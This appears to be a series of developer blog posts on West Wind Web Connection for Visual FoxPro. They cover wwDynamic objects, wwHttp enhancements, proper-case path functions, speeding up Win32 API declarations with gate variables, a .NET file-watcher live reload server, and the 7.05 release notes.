loItem = CREATEOBJECT("wwDynamic",loCust)

*** Alternately you create a new object (EMPTY class) 
* loItem = CREATEOBJECT("wwDynamic")

loItem.Bogus = "This is bogus"
loItem.Entered = DATETIME()

? loItem.Bogus
? loItem.Entered

loItem.oChild.Bogus = "Child Bogus"
loItem.oChild.Entered = DATETIME()

? loItem.oChild.Bogus
? loItem.oChild.Entered

*** Access original cCustomer props
? loItem.cFirstName
? loItem.cLastName
? loItem.GetFullName()

For properly typed names with casing left intact for JSON serialization, .AddProp() can be used:

loMessage = CREATEOBJECT("wwDynamic")
loMessage.AddProp("Sid", "")
loMessage.AddProp("DateCreated", DATETIME())
loMessage.AddProp("DateUpdated", DATETIME())
loMessage.AddProp("DateSent",DATETIME())
loMessage.AddProp("AccountSid","")
loMessage.AddProp("ApiVersion","")

* "Sid,DateCreated,DateUpdated,DateSent,AccountSid,ApiVersion"
? loMessage.__PropertyNameOverrides 

? loMessage.DateCreated
? loMessage.DateUpdated

loSer = CREATEOBJECT("wwJsonSerializer")
lcJson = loSer.Serialize(loMessage)  && produces properly cased property names

Note: I got the idea for this from Marco Plaza on the Universal Thread, who provides a library with a slightly different implementation that is a little more verbose, but provides a more pure data implementation. wwDynamic takes a more pragmatic approach that focuses on ease of use in code, but there are a couple of edge cases due to FoxPro's weird handling of a few reserved property names.

A few wwHttp Enhancements

There are also a couple of enhancements in wwHttp. The first gives you additional control over file uploads via new parameters to .AddPostKey() when posting multi-part form variables and specifically files.

.AddPostKey() now supports additional tcContentType and tcExtraHeaders parameters that allow you to specify a content type and additional Mime headers to the content. Extra headers are added as self-contained lines. Files now also add a content-length header to the attached file.

loHttp = CREATEOBJECT("wwHttp")
loHttp.nHttpPostMode = 2  && multi-part
loHttp.AddPostKey("txtNotes","Image of a wave")

*** Add content type and an extra header to the file upload
loHttp.AddPostKey("File",".\wave.jpg",.T.,"image/jpeg","x-file-id: 451a423df")

lcResult = loHttp.Post(lcUrl)

The wwHttp class now also adds new explicit methods for .Get(), .Post(), .Put() and .Delete(). These are simply wrappers around the existing .HttpGet() method that set the `cHttpVerb` property accordingly before making the request.
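
Here's a quick sketch of what the new verb methods look like in practice. Note that the exact parameter conventions beyond the URL are assumptions based on the existing .HttpGet() behavior, so check the wwHttp documentation for specifics:

loHttp = CREATEOBJECT("wwHttp")

*** GET a resource as a string
lcHtml = loHttp.Get("https://www.west-wind.com")

*** POST previously added form variables to a URL
loHttp.AddPostKey("txtName","Rick")
lcResult = loHttp.Post("https://example.com/customer/save")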

New wwUtils Path Functions that support Proper Case Paths

Added several new functions to the wwUtils library that deal with returning filenames with proper paths. FoxPro's native path functions have the nasty habit of mangling paths to upper case, and in several applications this has caused me a number of issues with paths getting embedded with non-matching case. This can be problematic for Web content that might end up on a case sensitive Linux server.

There are now GetFullPath(), GetRelativePath(), OpenFileDialog() and SaveFileDialog() functions that all return paths in the proper case for files located or created on disk.

The OpenFileDialog() and SaveFileDialog() functions provide Windows File Open and File Save dialogs using the .NET file dialogs. All of the new methods use .NET code to provide the properly cased paths.
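
Here's a rough sketch of how these functions might be used. The exact parameter signatures are assumptions for illustration, so check the wwUtils documentation for specifics:

DO wwUtils

*** Returns the path in its proper on-disk casing (assumed signature)
lcFull = GetFullPath("images\wave.jpg")

*** Returns a properly cased path relative to a base folder (assumed signature)
lcRelative = GetRelativePath("c:\WebConnection\Web\images\wave.jpg", SYS(5) + CURDIR())

*** .NET based File Open dialog - returns the selected file in proper case
lcFile = OpenFileDialog()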

Interesting that it is so hard to translate paths into properly cased paths in Windows. I noodled around with various Windows API calls but it turns out they all have a few odd quirks that make them not work reliably especially for figuring out a relative path.

In the end the easiest solution was to call into .NET and rely on a combination of Path and URL helper system calls to provide the functionality. Even the .NET code is not as straightforward as it could be. For me this was a requirement for a documentation application I've been working on for a customer, where generated HTML output image links had to exactly match the file and path names on disk. This also fixes a similar issue for me in Html Help Builder, where traditionally paths were embedded as all lower case.

All Web Connection Binaries are now Signed

All Web Connection Binaries that are shipped - the setup and console exes, all dlls and the setup self-extracting package - are now properly signed with a digital certificate to verify the authenticity of the binaries as coming from West Wind Technologies. The signed exes should help with reducing nasty warning messages from Windows and SmartScreen and provide a nicer, less scary elevation prompt that also displays the West Wind source of the code instead of an anonymous binary name.

Summary

As you can see there's quite a bit of new stuff in this small point release. Behind the scenes Web Connection now also has a more reliable build process to compile each release, which has traditionally been very time consuming for me because of all the varied pieces pulled in. This release is the first that uses a fully automated end-to-end build process that completes in about 20 seconds. It won't make it quicker to fix errors and add new features, but it will make it much easier to release updates if we should find a breaking issue. Plan on seeing more frequent releases with smaller sets of changes in the future.

Check it out and as always please post any issues that you might run into on the Message Board.

See you there...

this post created and published with Markdown Monster

API Declarations in Performance Sensitive FoxPro Code


Visual FoxPro has good support for interfacing with the Win32 API by using the DECLARE keyword, which lets you map a function in a Win32 DLL to a FoxPro callable function.

The good news is that a) you can do this and b) it's very efficient. FoxPro's interface to a DLL call, once it's declared, is very quick.

Call your DLLs right

When you make API calls in FoxPro it's basically a two step process:

  • Declare your API and map it to a FoxPro function
  • Call the mapped function

Personally I tend to almost always wrap API calls in separate FoxPro functions that abstract away the API-ness of the function:

FUNCTION WinApi_SendMessage(lnHwnd,lnMsg,lnWParam,lnLParam)

DECLARE integer SendMessage IN WIN32API ;
        integer hWnd,integer Msg,;
        integer wParam,;
        Integer lParam

RETURN SendMessage(lnHwnd,lnMsg,lnWParam,lnLParam)
ENDFUNC 

to make it easier to call this code from FoxPro directly. It works fine this way, but for APIs that are called frequently in quick succession you may find that performance is not all that great.

A Real World Example

Recently Christof Wollenhaupt posted a Windows API based implementation of various hash encryption routines called FoxCryptoNg that uses only native Windows APIs and doesn't require any external libraries. You can check out the code here.

If you look at the code you see there's a DeclareApiFunction section that declares a number of APIs and originally his code would call the DeclareApiFunctions() method for each hash operation.

I checked out the code and ran some tests for performance (not really sure why) comparing it with the routines that I use in the wwEncryption class in the West Wind Client Tools and Web Connection.

When running the tests initially - when the declare APIs were called for each method call - the performance was abysmal. So much so that I filed an issue on Github.

The issue basically compares the function vs. the wwEncryption class. Running a test of 1000 SHA256 hash encodings was taking over 15 seconds with the FoxCryptoNg class vs. under a second with the .NET based routines in wwEncryption.

Christof eventually responded and tracked down the performance problem to the API declarations. By changing his code to make the declarations in the Init() instead of in each method, performance ended up actually being a little faster than the .NET based approach.

Watch your Declarations

So the code to compute a hash went from:

Procedure Hash_SHA256 (tcData)
	Local lcHash
	DeclareApiFunctions()
	lcHash = This.HashData ("SHA256", m.tcData)
Return m.lcHash

taking over 15 seconds for 1000 hashes

to:

Procedure Init()
	DeclareApiFunctions()
EndProc

Procedure Hash_SHA256 (tcData)
	Local lcHash
	lcHash = This.HashData ("SHA256", m.tcData)
Return m.lcHash

to 0.7 seconds.

Whoa hold on there hoss - that's more than 20 times faster!!!

The moral of the story is that API calls are fast, but declarations are not!

The reason for this is that FoxPro has to look up these API functions in the Windows libraries: it has to find the function in these rather large libraries, verify the function signature, and then provide a mapping to a function that can be called from FoxPro code. That setup takes time, and that's exactly what we're seeing here in terms of performance.

Bottom Line: For high traffic API calls - separate your API declaration from your API call!

Christof's solution was to simply move the declaration to the Init() which is fair. But as he points out in his response there's the possibility that somebody calls CLEAR DLLS at some point, which would lose the declarations, and the API calls would then fail. I actually find that quite unlikely but hey - anything is possible. If you can fuck it up, somebody probably will.

Isolating API Call From Declaration

I had never really given a lot of thought to the performance of API calls, although implicitly I've always felt like API calls didn't run particularly fast. I never really tested, but now I think that the perceived slowness may have simply been the declaration overhead. In most of my applications the API declarations go with the call, so my code is as culpable as Christof's when it comes to performance issues.

For example here's one that actually gets called quite frequently in my code - calling one of my own DLLs - and probably could use DECLARE optimization.

************************************************************************
*  JsonString
****************************************
FUNCTION JsonString(lcValue)
DECLARE INTEGER JsonEncodeString IN wwipstuff.dll string  json,string@  output
LOCAL lcOutput 
lcOutput = REPLICATE(CHR(0),LEN(lcValue) * 6 + 3)
lnPointer = JsonEncodeString(lcValue,@lcOutput)
RETURN WinApi_NullString(@lcOutput)
ENDFUNC
*   JsonString

Find High Traffic Methods and Separate

There are a number of ways you can separate the declaration from the call so that declarations happen just once.

Use a Class and DeclareApis style Initialization

Christof's solution of using a DeclareApis() function where you have all your declares in one place up front is a great solution if you are using a class. Why a class? Because it has a clear entry point - the Init() - where you can isolate the declarations. A class is also a reference that you can easily hold onto after an individual call, and then reuse later to make additional calls.

Just to reiterate, to do this you'd create:

DEFINE Class ApiCaller as Custom

Procedure Init()
	DeclareApiFunctions()
EndProc

Procedure DoSomething(tcData)
	return ApiMethod(tcData)
EndProc

Procedure DeclareApiFunctions()
    DECLARE Integer ApiMethod In mydll.dll string
    DECLARE ...
EndProc

ENDDEFINE

Static Declarations

The above approach works reasonably well but it may still end up calling the declarations many times because you may be instantiating the class multiple times.

Another approach I've found useful on high traffic APIs is to wrap them around a PUBLIC gate variable that checks if the API was previously declared.

So imagine I have this function (as I do in wwUtils.prg in various West Wind Tools):

FUNCTION JsonString(lcValue)

DECLARE INTEGER JsonEncodeString IN wwipstuff.dll string  json,string@  output

LOCAL lcOutput 
lcOutput = REPLICATE(CHR(0),LEN(lcValue) * 6 + 3)
lnPointer = JsonEncodeString(lcValue,@lcOutput)
RETURN WinApi_NullString(@lcOutput)
ENDFUNC

Running the following test code:

DO wwutils
lnSeconds = SECONDS()
FOR lnX = 1 TO 100000
	lcJson = JsonString("Hello World")
	lcJson = JsonString("Goodbye World")
ENDFOR

lnSecs = SECONDS() - lnSeconds
? lnSecs

takes 15.2 seconds to run.

Now let's change this code with a Public gate variable definition that only declares it once:

FUNCTION JsonString(lcValue)

PUBLIC __JsonEncodeStringAPI
IF !__JsonEncodeStringAPI
	DECLARE INTEGER JsonEncodeString IN wwipstuff.dll string  json,string@  output
	__JsonEncodeStringAPI = .T.
ENDIF	

LOCAL lcOutput 
lcOutput = REPLICATE(CHR(0),LEN(lcValue) * 6 + 3)
lnPointer = JsonEncodeString(lcValue,@lcOutput)
RETURN WinApi_NullString(@lcOutput)
ENDFUNC

This now takes 0.72 seconds to run. That's more than 20x the performance!

This code is not pretty and it relies on a public variable, but it's undeniably efficient.

The way this works is that a public boolean variable is created. Initially its value is .F. because FoxPro initializes variables to .F. when they are first created (and PUBLIC on an already existing variable doesn't reset its value). So the code checks for that and, if it's .F., declares the API and also sets the PUBLIC variable to .T.. The next time through, the value of the public var is .T. and the declare doesn't fire again. It's a little trick to create a run-once code path at the expense of an extra PUBLIC variable.

Apply to Blocks of Declarations

You can apply the same technique to a larger set of API declarations that you might make in Init() or DeclareApis() type call. For example in wwAPI's init method I do the following now:

PUBLIC __wwApiDeclarationsAPI
IF !__wwApiDeclarationsAPI
	DECLARE INTEGER GetPrivateProfileString ;
	   IN WIN32API ;
	   STRING cSection,;
	   STRING cEntry,;
	   STRING cDefault,;
	   STRING @cRetVal,;
	   INTEGER nSize,;
	   STRING cFileName
	DECLARE INTEGER GetPrivateProfileSectionNames ;
	   IN WIN32API ;
	   STRING @lpzReturnBuffer,;
	   INTEGER nSize,;
	   STRING lpFileName 

	DECLARE INTEGER WritePrivateProfileString ;
	      IN WIN32API ;
	      STRING cSection,STRING cEntry,STRING cValue,;
	      STRING cFileName     

	DECLARE INTEGER GetCurrentThread ;
	   IN WIN32API 
	   
	DECLARE INTEGER GetThreadPriority ;
	   IN WIN32API ;
	   INTEGER tnThreadHandle

	DECLARE INTEGER SetThreadPriority ;
	   IN WIN32API ;
	   INTEGER tnThreadHandle,;
	   INTEGER tnPriority

	*** Open Registry Key
	DECLARE INTEGER RegOpenKey ;
	        IN Win32API ;
	        INTEGER nHKey,;
	        STRING cSubKey,;
	        INTEGER @nHandle

	*** Create a new Key
	DECLARE Integer RegCreateKey ;
	        IN Win32API ;
	        INTEGER nHKey,;
	        STRING cSubKey,;
	        INTEGER @nHandle

	*** Close an open Key
	DECLARE Integer RegCloseKey ;
	        IN Win32API ;
	        INTEGER nHKey
	  
	DECLARE INTEGER CoCreateGuid ;
	  IN Ole32.dll ;
	  STRING @lcGUIDStruc
	  
	DECLARE INTEGER StringFromGUID2 ;
	  IN Ole32.dll ;
	  STRING cGUIDStruc, ;
	  STRING @cGUID, ;
	  LONG nSize
	__wwApiDeclarationsAPI = .T.
ENDIF
    
ENDFUNC
* Init

which loads all those API declarations only once.

This is a neat trick that I've recently applied to a few key APIs that are in heavy use in Web Connection, and seen a nice speed bump for a few common operations. The trade-off is a few extra PUBLIC boolean variables bumping around in memory - a small price to pay for the performance gain.

Caveat: CLEAR DLLS can break this!

Both of these approaches - per declaration or per block - do come with a caveat: it is possible for some other code to issue CLEAR DLLS, and that will break subsequent API calls because the DLLs unload but the gate variable stays set.
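
If you're worried about that scenario, one possible defensive pattern - just a sketch, not how the shipped code works - is to wrap the actual call in TRY/CATCH and re-declare once if the call fails:

FUNCTION JsonString(lcValue)
LOCAL lcOutput, lnPointer

PUBLIC __JsonEncodeStringAPI
IF !__JsonEncodeStringAPI
	DECLARE INTEGER JsonEncodeString IN wwipstuff.dll string json, string@ output
	__JsonEncodeStringAPI = .T.
ENDIF

lcOutput = REPLICATE(CHR(0),LEN(lcValue) * 6 + 3)
TRY
	lnPointer = JsonEncodeString(lcValue,@lcOutput)
CATCH
	*** Somebody issued CLEAR DLLS - re-declare and retry once
	DECLARE INTEGER JsonEncodeString IN wwipstuff.dll string json, string@ output
	lnPointer = JsonEncodeString(lcValue,@lcOutput)
ENDTRY

RETURN WinApi_NullString(@lcOutput)
ENDFUNC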

Not for Every API Call

To be clear, you don't need to do this for every API call. There's no need, say, for this API call:

FUNCTION WinApi_Sleep(lnMilliSecs, llWithDoEvents)
LOCAL lnX, lnBlocks

lnMillisecs=IIF(type("lnMillisecs")="N",lnMillisecs,0)

DECLARE Sleep ;
  IN WIN32API ;
  INTEGER nMillisecs

IF !llWithDoEvents OR lnMillisecs < 200   
   Sleep(lnMilliSecs)    
   RETURN
ENDIF

*** Create 100ms DOEVENTS loop to keep UI active
lnBlocks = lnMilliSecs / 100
FOR lnX = 1 TO lnBlocks - 1 
   Sleep(100)
   DOEVENTS
ENDFOR

ENDFUNC

Watch for Premature Optimization

The Sleep call above is obviously an operation that's meant to be slow, so there's no need to speed it up. This optimization also isn't necessary for UI related tasks, or basically anything that's called only occasionally. It's only for things that are used on the critical path, and especially operations that might occur in a tight loop or many times in succession.

The previous JsonString example is a good one - that function is called quite frequently when serializing objects. An array or collection may have hundreds of objects with many string properties, for example, and there it makes a big difference.

Likewise in Web Connection there's a UrlDecode() function that calls into wwIPStuff.dll to decode larger strings. For large input forms in a Web application that function may be called 100 times in succession, and again that ends up making a difference.

So choose wisely.

Summary

API calls are one of the earliest Interop features in the FoxPro language and they provide a powerful and potentially fast interface to external functionality in Win32 DLL code.

Just remember that declaring your API may have significantly more overhead than actually calling it, so for critical path operations either declare the API up front or use the gate-keeper trick I showed above to bracket the code and load the declarations only once for the lifetime of the application.

Building a Web Connection Live Reload Server


Look 'ma - no hands

Look Ma! No hands... I love shaving off time in my development cycle. A lot of what we do during Web development is highly repetitive, and removing some of the steps in the typical process - even small adjustments that save a little time - can end up saving a lot of time over the course of a day, and especially over the lifetime of a project. This post is about saving time in the build, debug, run cycle.

A few months ago I wrote about how you can use Browser-Sync with Web Connection to automatically reload your browser when you make changes to HTML and other Web related resources in your projects. The idea is that you run a command line utility that acts as a Web request proxy that detects changes on disk, and when it finds a change it automatically causes the browser to reload. It's incredibly useful and productive to work that way: you can literally see the changes you make in real time as soon as you save to disk - the browser automatically refreshes the page you are already on, without a manual reload.

One thing that has been missing though is the ability to also detect server side code changes and automatically refresh the Web Connection server.

Consider the current scenario when you make a change to server side Web Connection Code:

  • I start my Web Connection Server
  • I find a problem with my Code
  • I stop the server
  • From the Command Window open the editor
  • I find the code with the problem
  • I make the change and save
  • I start the server back up from the Command Window
  • I refresh my Web page

That's a lot of steps - and I know I go through them quite a bit. Note that this applies both to HTML code and API implementations. With APIs a browser refresh isn't an issue, but restarting the server very much is - it's the same for APIs as it is for HTML based Web UIs.

Now imagine that you can edit your code and don't have to stop the Web Connection server manually, nor restart it. That's what I'll talk about in this post.

Using what I'll describe here we'll be able to cut the steps above down to:

  • I start my Web Connection Server
  • I open my open editor (still in context usually)
  • I make a change and save
  • If BrowserSync is also running, active page auto-refreshes

This may not seem like a lot of saved steps, but it takes out the most time consuming ones: stopping the server, typing the file to edit, and then afterwards starting the server back up again. It easily shaves 20-30 seconds off the debug/run cycle, which is significant.

Here's what both Live Reload and Browser Sync look like when used in combination:

Notice that at no point in this demo do I restart or refresh either the Web Connection server or the Web Page - the changes happen as soon as I save my changes to disk.

Best with DebugMode off

Note that for best results it's also best that you run the server with DebugMode off. With DebugMode off errors are handled by Web Connection and display an error page, rather than breaking which interrupts the flow shown above.

With errors not breaking and displaying a message instead, you can use the error message to figure out where to make a change, change the code and simply save, and the server is right back up and running. Additionally, if you use an external editor like VS Code you can just leave your code editor open and stay in context - unlike the FoxPro editor, which locks source PRG files.

Watching Server Side Files

The idea is that it's possible to set up a file watcher and watch for changes on disk. When a code file is changed the watcher tells the Web Connection app to shut down and restart itself. If SET DEVELOPMENT ON is set, the file change is automatically detected by FoxPro and the file is automatically recompiled when it gets loaded again.

Optionally if you prefer to work with compiling your project into EXE after changes instead of starting the PRG file (as I like to do during dev time), you can also change the default logic to rebuild your project's EXE as part of the restart process. I'll show how to do that later.

Note that this works especially well if you use an external editor like VS Code with the FoxPro language extension.

You can also use the FoxPro editor as long as you turn off automatic compilation on save. Why? Because you'll be editing live code that is actually still running while you're editing. If the editor tried to compile on save, compilation would fail because the .FXP file or class is in use by the running instance. So if you want to use this feature with the FoxPro editor, make sure to turn off the Compile on Save option.

How do I set this up?

The way this is implemented is via a new helper function that sets up a .NET file watcher that watches for file changes. When a source code file is changed or added, the helper unloads the running, file based Web Connection server and restarts it. It also creates a small temporary file that forces browser-sync - if it's running - to refresh the active Web page.

So let's see what this looks like using Web Connection 7.05 and later. Starting with that version the templates automatically include the required logic to hook up the Live Reload functionality via a custom LiveReloadServer=On configuration setting.

If you're creating a new project with Web Connection 7.05 and later, the following code is auto-generated into the source code, so you don't need to add anything. If you have an older application and are updating to 7.05 or later you can use the following to add this functionality to an existing application.

All the code hookups are done in your mainline program (AppMain.prg) in the file based start code block.

There are two parts to this process:

  • Hook up the file watcher
  • Handle the shutdown and restart process

The first bit is setting up the file watcher implementation which lives in a new file in LiveReloadServer.prg. This class uses wwDotnetBridge to create a file watcher, and an event handler that can capture the file change events that are fired from that component.

Hooking up this component is done after the Web Connection server is initially created, and it's very simple:

*** Load the server - the wwThreadsServer class in this example
goWCServer = CREATEOBJECT("WwthreadsServer")

*** Live Reload Server if program files are changed on disk (File Watcher)  
IF goWCServer.oConfig.lLiveReloadServer AND Application.StartMode = 0
   DO LiveReloadServer
ENDIF

The LiveReloadServer.prg function that sets up the watcher is loaded only when running in the IDE, and only if the LiveReloadServer flag is set in the server configuration. Once this is done the file watcher watches all source code files, and when any .prg, .vcx, .app, .exe or .ini file (by default) is changed, the watcher triggers code that terminates the READ EVENTS loop that keeps the server alive, causing the application to shut down. An lAutoRestart flag is also set on the server, and if the application is shutting down in restart mode, additional code is run to restart the server.

*** Make the server live - Show puts the server online and in polling mode
READ EVENTS

*** Check if server wants to auto-restart - store to var so we can release
LOCAL llAutoRestart
llAutoRestart = goWcServer.lAutoRestart

ON ERROR

...

*** Release all but the variable
RELEASE ALL EXCEPT llAutoRestart
CLOSE DATA

IF llAutoRestart
   IF VARTYPE("__WWC_FILEWATCHER") = "O"
      __WWC_FILEWATCHER.Destroy()
      __WWC_FILEWATCHER = null
   ENDIF 
   CLEAR ALL   

    *** Try to restart this application
   KEYBOARD [CLEAR PROGRAM{ENTER}] + ;
            [DO wwThreadsMain.prg{ENTER}]                
   
   *** If BrowserSync is running this will refresh the active page
   STRTOFILE(TRANSFORM(DateTime()),"..\Web\__CodeUpdated.html")            
ELSE
   CLEAR ALL      
ENDIF

Shutting down a Web Connection application and restarting it is tricky, because you want to shut down yet maintain some state. It's also important to ensure that the application is completely shut down before restarting, so that the code will recompile. In order for this to work, some trickery with the KEYBOARD command is used to actually type commands into the Command Window after the app shuts down to restart it. CLEAR PROGRAM is important to ensure that all classes get unloaded properly - without it there are problems with the code not recompiling. Finally, the code also writes a temporary file into the Web folder to trigger Browser Sync to refresh the current page.
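
As mentioned earlier, you can also change this logic to rebuild your project into an EXE as part of the restart instead of re-running the PRG. A sketch of what the restart commands might look like - the wwThreads project and file names are assumptions carried over from the example above, so substitute your own:

*** Rebuild the EXE and run it instead of the PRG (sketch)
KEYBOARD [CLEAR PROGRAM{ENTER}] + ;
         [BUILD EXE wwThreads FROM wwThreads RECOMPILE{ENTER}] + ;
         [DO wwThreads.exe{ENTER}]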

The first part of the video shows server live reload, where I'm making a change inside of a PRG Process class. All I do here is save, and the text is updated (small -> MASSIVE -> smallish). Then when I switch to the new message I add a bit of text (the <h2> tag) to a script page. I simply save, and the change is immediately shown.

There's no manual switching - the changes just show up immediately. Cool, right?

Although this may not seem so amazing to look at, it saves a ton of time during the development process as you don't have to keep switching between windows to start and stop the server and constantly refresh the browser.

How does it work?

As mentioned, the key feature that makes the server reload work is a file watcher. Where browser-sync is a separate application that handles the Web files, the server live reload needs to be handled at the FoxPro Web Connection level. That's because although we can set up browser-sync to detect changes in PRG/VCX etc. files, we can't easily make it send a message back to FoxPro.

Using a .NET FileSystemWatcher instead makes that possible, by running the file watcher in the background while the Web Connection application is running.

The first step is loading the file watcher and hooking up an 'event handler' object that receives any of the events that the watcher publishes, creating a subscription using wwDotnetBridge:

************************************************************************
*  LiveReloadServer
****************************************
***  Function: Optional Live Reload Module that monitors changes 
***            to code files and if changed automatically reloads
***            the main program file
***    Assume: Called from Web Connection file based startup
***            when debug mode and LiveReloadServer are enabled
***      Pass: lcFileList:  Optional - List of file extensions ("*.prg,*.vcx,*.exe,*.ini")
***            lcFolder:    Optional - root folder
************************************************************************
LPARAMETERS lcFileList, lcFolder
LOCAL loBridge as wwDotNetBridge, loEventHandler as FileWatcherEventHandler, loSubscription

IF EMPTY(lcFolder)
   lcFolder = SYS(5) + CurDir()
ENDIF

*** Files that have changed 
IF EMPTY(lcFileList)
   lcFileList = "*.prg,*.vcx,*.exe,*.app,*.ini"
ENDIF

do wwDotNetBridge
loBridge = GetwwDotnetBridge()

PUBLIC __WWC_FILEWATCHER

__WWC_FILEWATCHER = loBridge.CreateInstance("System.IO.FileSystemWatcher",lcFolder)
__WWC_FILEWATCHER.EnableRaisingEvents = .T.
__WWC_FILEWATCHER.IncludeSubDirectories = .T.

loEventHandler = CREATEOBJECT("FileWatcherEventHandler")
loEventHandler.cFileList = lcFileList

loSubscription = loBridge.SubscribeToEvents(__WWC_FILEWATCHER, loEventHandler)
loEventHandler.oSubscription = loSubscription

RETURN

The event handler object then implements each of the events that the FileWatcher publishes. The class also includes a helper that filters the incoming change notifications to just the files we care about - *.prg, *.vcx, *.app, *.exe, *.ini. If - and only if - any of those files are changed do we want to restart the Web Connection server.

*************************************************************
DEFINE CLASS FileWatcherEventHandler AS Custom
*************************************************************
*: Author: Rick Strahl
*:         (c) West Wind Technologies, 2019
*:Contact: http://www.west-wind.com
*:Created: 05/04/2019
*************************************************************

cFileList = "*.prg,*.vcx,*.exe,*.app,*.ini"
oSubscription = null
nLastAccess = 0

FUNCTION OnCreated(sender,ev)

IF THIS.HasFileChanged(ev.FullPath)
	THIS.RestartWebConnection()
ENDIF
	
ENDFUNC

FUNCTION OnChanged(sender,ev)

IF THIS.HasFileChanged(ev.FullPath)
	THIS.RestartWebConnection()
ENDIF

ENDFUNC

FUNCTION OnDeleted(sender, ev)

IF THIS.HasFileChanged(ev.FullPath)
	THIS.RestartWebConnection()
ENDIF
ENDFUNC

FUNCTION OnRenamed(sender, ev)

IF THIS.HasFileChanged(ev.FullPath)
	THIS.RestartWebConnection()
ENDIF

ENDFUNC


ENDDEFINE

The events that are handled all have the same implementation: checking whether files have changed, and if so, restarting the server. These two functions are the key, and they are both pretty simple:

************************************************************************
*  HasFileChanged
****************************************
FUNCTION HasFileChanged(lcFilename as String)
LOCAL lcFileList, lnX, lnFiles
LOCAL ARRAY laExtensions[1]

IF SECONDS() - this.nLastAccess < 5
   RETURN .F.
ENDIF   
this.nLastAccess = SECONDS()

IF ATC("\temp\",lcFileName) > 0
   RETURN .F.
ENDIF

lcFileList = STRTRAN(THIS.cFileList,"*.","")
lnFiles =  ALINES(laExtensions,lcFileList,1 + 4,",")

lcExtension = LOWER(JUSTEXT(lcFilename))
FOR lnX = 1 TO lnFiles
    IF lcExtension == LOWER(laExTensions[lnX])
       RETURN .T.
    ENDIF
ENDFOR

RETURN .F.
ENDFUNC
*   HasFileChanged

************************************************************************
*  RestartWebConnection
****************************************
FUNCTION RestartWebConnection()

*** Force file based server to shut down and then restart
IF VARTYPE(goWcServer) = "O"
	goWcServer.lAutoRestart = .t.
	CLEAR EVENTS
ENDIF

ENDFUNC
* RestartWebConnection

HasFileChanged checks to see whether the file falls in the scope of what we're looking for. It looks for the required file extensions and excludes anything from the \temp folder (which unfortunately is part of the folder hierarchy).

File watchers have no comprehensive filter functionality (only a single filter can be applied), so every file change is fired into the event handler. This includes all of the message files that are created in file based messaging. HasFileChanged() makes sure that we only get notified for code files.

RestartWebConnection() then is responsible for restarting Web Connection and it only does two things:

  • It sets the lAutoRestart property on the server
  • It clears the READ EVENTS loop that shuts down the server

It's basically a trigger routine. The lAutoRestart property is checked by the mainline following the READ EVENTS, and it determines whether the restart code is fired. You can look back at the earlier snippets to see this implemented.

What's really cool is that this is a pretty simple implementation with very little code - albeit with a few FoxPro specific hacks to work around the fact that it's hard to shut down a running FoxPro program completely, and to ensure that everything gets fully unloaded before restarting the application.

Time Saver!

I've been using this functionality for the last few weeks working on a client application and it's been a huge time saver.

I run my application with DebugMode off most of the time now, so rather than letting my application crash on errors I rely on the error display to tell me when and where an error occurs. I then open the file(s) in question, make the change and save, and the app automatically reloads. It makes for very fast iteration and it's beautiful!

If you haven't previously checked out browser-sync, that's a great place to start. And Live Reload is coming in 7.05, which should be available shortly.

Check it out!

Resources

this post created and published with Markdown Monster

Web Connection 7.05 Release Notes


Web Connection 7.05 is here! This release is primarily a maintenance release with a few small fixes and a few performance enhancements. But there are also a number of pretty cool new features that I'm excited about.

A new Launcher for new Projects

This may not sound that exciting, but for new users the new Launch.prg that gets generated into any new project should make it much easier to launch your applications, especially if you chose a Web Server that doesn't automatically start, like IIS Express, or are using Browser Sync.

Web Connection 7.0 started shipping with a Launch.prg and the docs have been updated to use DO Launch in order to start your application instead of DO YourAppMain.prg. The latter still works but Launch.prg does a number of other things on your behalf:

  • Sets the Environment to add required paths
  • Launches an external Web Server if required (IIS Express, Browser Sync)
  • Launches your application: DO YourAppMain.prg
  • Launches a browser and opens the appropriate URL

Launch.prg is generated when a new project is created and so it includes all the required path dependencies and it knows whether you chose IIS or IIS Express during setup so that DO Launch just works and does the right thing. So if you chose IIS Express during configuration for your new project, Launch will automatically start IIS Express, and open the IIS Express specific URL (which is different than the IIS URL).

But you're not limited to that. Launch.prg can launch your application in any of the supported modes - IIS, IIS Express and Browser Sync - or simply launch your FoxPro server.

In 7.0 Web Connection also shipped a separate BrowserSync.prg file to integrate with the great BrowserSync utility. BrowserSync is a NodeJs based utility that allows you to automatically detect file system changes for specific files and, if changes are detected, automatically refresh the browser. It's great for refreshing Web pages, CSS, HTML and JavaScript and immediately seeing your changes reflected in the browser without manually reloading the page. It's highly productive for an interactive workflow and can really speed up the client side development cycle when changing layout, writing JavaScript code or tweaking CSS.

You can find out more about BrowserSync in the docs and in this blog post.

In 7.05 the BrowserSync functionality has been rolled into Launch.prg which now supports a number of different explicit operational modes:

  • DO LAUNCH WITH "IIS"
  • DO LAUNCH WITH "IISEXPRESS"
  • DO LAUNCH WITH "BROWSERSYNC"
  • DO LAUNCH WITH "BROWSERSYNCIISEXPRESS"
  • DO LAUNCH WITH "NONE"  && or "SERVER"

Each mode performs its own specific startup operations. Note that the last option, "NONE" or "SERVER", simply launches the Web Connection FoxPro server. The advantage of using the Launch syntax over a direct launch is that it also sets up the environment.

Launch.prg is just a short FoxPro program and because it's code you can customize it. Want to add additional paths during startup? Start up another application in the background? You can do that. It gives you an extra level of control.

For new developers getting started, having a single PRG that does everything to start the server will reduce friction. But for old hands it's also useful because it makes it very easy to switch between modes - I can easily switch back and forth between running on IIS, IIS Express or using Browser Sync.

Launch.prg gets generated with new projects, but if you have an existing project you can take advantage of this pretty easily by creating a new project, copying Launch.prg into your existing project, and then making a few small changes to the file's startup header that parameterizes the script.

To find out more check out the Launch.prg documentation.

Live Reload Server

Browser Sync is a huge help in speeding up the client side development cycle. In 7.05 Web Connection now also adds a Live Reload feature for server side code. By optionally running a file watcher as part of the Web Connection server, Web Connection can now monitor for code file changes and, if it detects one, automatically restart your FoxPro server.

The current scenario for this involves a lot of steps:

  • Run your program
  • Find a bug
  • Program Stops and you edit the code
  • Save the code
  • Close everything (CLOSE ALL, CLEAR ALL etc.)
  • Start the Web Connection Server again
  • Refresh your browser

Using the LiveReloadServer configuration switch in yourApp.ini you can put the server into Live Reload mode, after which you can make a code change and immediately and automatically get your server restarted, which reduces the steps to:

  • Run your code
  • See an error message
  • Use an external editor to fix the code
  • Save your code
  • Web Connection Restarts, and Browser AutoRefreshes (if using Browser Sync)

In order for this to work a couple of things should be in place:

  • Best to run with DebugMode OFF
  • Must edit code with an external editor (VS Code or another instance of FoxPro)
  • If you use the FoxPro editor make sure auto-compilation is off
  • Best when run in combination with Browser Sync

Here's what this looks like:

